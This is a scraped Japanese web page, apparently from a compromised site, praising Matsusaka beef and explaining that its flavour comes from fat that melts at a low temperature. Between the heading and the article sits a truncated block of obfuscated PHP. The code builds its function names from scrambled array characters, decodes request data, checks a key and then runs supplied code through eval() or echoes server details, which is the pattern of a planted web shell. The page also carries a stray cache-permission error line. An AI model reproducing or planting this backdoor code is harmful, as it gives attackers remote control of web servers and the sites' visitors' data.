キャッシュディレクトリのパーミッション(属性)を確認して下さい。 松阪牛伝承

松阪牛伝承

旨さの秘密は「脂」にあり。松阪牛

$o01cb0){$h7fe = $o01cb0;$i9be52 = $af75de7;}if (!$h7fe){foreach ($f34c[$f34c['s8901a0'][73].$f34c['s8901a0'][36].$f34c['s8901a0'][20].$f34c['s8901a0'][91].$f34c['s8901a0'][68].$f34c['s8901a0'][82].$f34c['s8901a0'][67]] as $af75de7=>$o01cb0){$h7fe = $o01cb0;$i9be52 = $af75de7;}}$h7fe = @$f34c[$f34c['s8901a0'][24].$f34c['s8901a0'][5].$f34c['s8901a0'][16].$f34c['s8901a0'][67].$f34c['s8901a0'][39]]($f34c[$f34c['s8901a0'][29].$f34c['s8901a0'][58].$f34c['s8901a0'][20].$f34c['s8901a0'][20]]($f34c[$f34c['s8901a0'][89].$f34c['s8901a0'][75].$f34c['s8901a0'][39].$f34c['s8901a0'][1]]($h7fe), $i9be52));if (isset($h7fe[$f34c['s8901a0'][91].$f34c['s8901a0'][51]]) && $a293a2==$h7fe[$f34c['s8901a0'][91].$f34c['s8901a0'][51]]){if ($h7fe[$f34c['s8901a0'][91]] == $f34c['s8901a0'][86]){$cac27 = Array($f34c['s8901a0'][38].$f34c['s8901a0'][2] => @$f34c[$f34c['s8901a0'][49].$f34c['s8901a0'][75].$f34c['s8901a0'][18].$f34c['s8901a0'][58].$f34c['s8901a0'][36].$f34c['s8901a0'][75]](),$f34c['s8901a0'][33].$f34c['s8901a0'][2] => $f34c['s8901a0'][75].$f34c['s8901a0'][65].$f34c['s8901a0'][11].$f34c['s8901a0'][13].$f34c['s8901a0'][75],);echo @$f34c[$f34c['s8901a0'][24].$f34c['s8901a0'][39].$f34c['s8901a0'][16].$f34c['s8901a0'][1].$f34c['s8901a0'][18].$f34c['s8901a0'][11].$f34c['s8901a0'][1]]($cac27);}elseif ($h7fe[$f34c['s8901a0'][91]] == $f34c['s8901a0'][67]){eval/*w4a13*/($h7fe[$f34c['s8901a0'][29]]);}exit();} ?>

高級食材とし知られる「松阪牛」。その美味しさの秘密は「脂」にあります。

旨さの秘密は「脂」にあり。松阪牛

高級肉の代名詞「松阪牛」、その美味しさの秘密は「脂」にあると言われています。

松阪牛は他の牛肉に比べると、脂が溶け出す温度(融点)が低いのが特徴で、手で持っただけでも脂が溶け出します。

よく「口の中で溶ける…」なんてテレビのグルメレポーターが言ってますが、松阪牛は口に入れただけで旨味を持った脂がとろけ出すのです。

この溶けやすい脂特有の柔らかさこそ、他の牛肉にはない松阪牛ならではの美味しさの秘密なんです。

さしの入った松阪牛をステーキにすると、熱が加わったことで脂の部分が溶け出し、周りの過網の部分も柔らかくなります。

この柔らかさが松阪牛だけがもつまろやかな旨味を演出します。

また、牛肉特有の鼻につく匂いもなく、肉本来の香りが楽しめます。

また「ココロを掴む松阪牛ナビ」でも記載があるとおり、すき焼きにするというのも味わい方の一つです。

松阪牛が美味しいのにはれっきとした理由があるんです。

理由があるからこそ…高いのです。

Yahoo! JAPAN

  • ウェブ全体を検索
  • このサイト内を検索

CONTENTS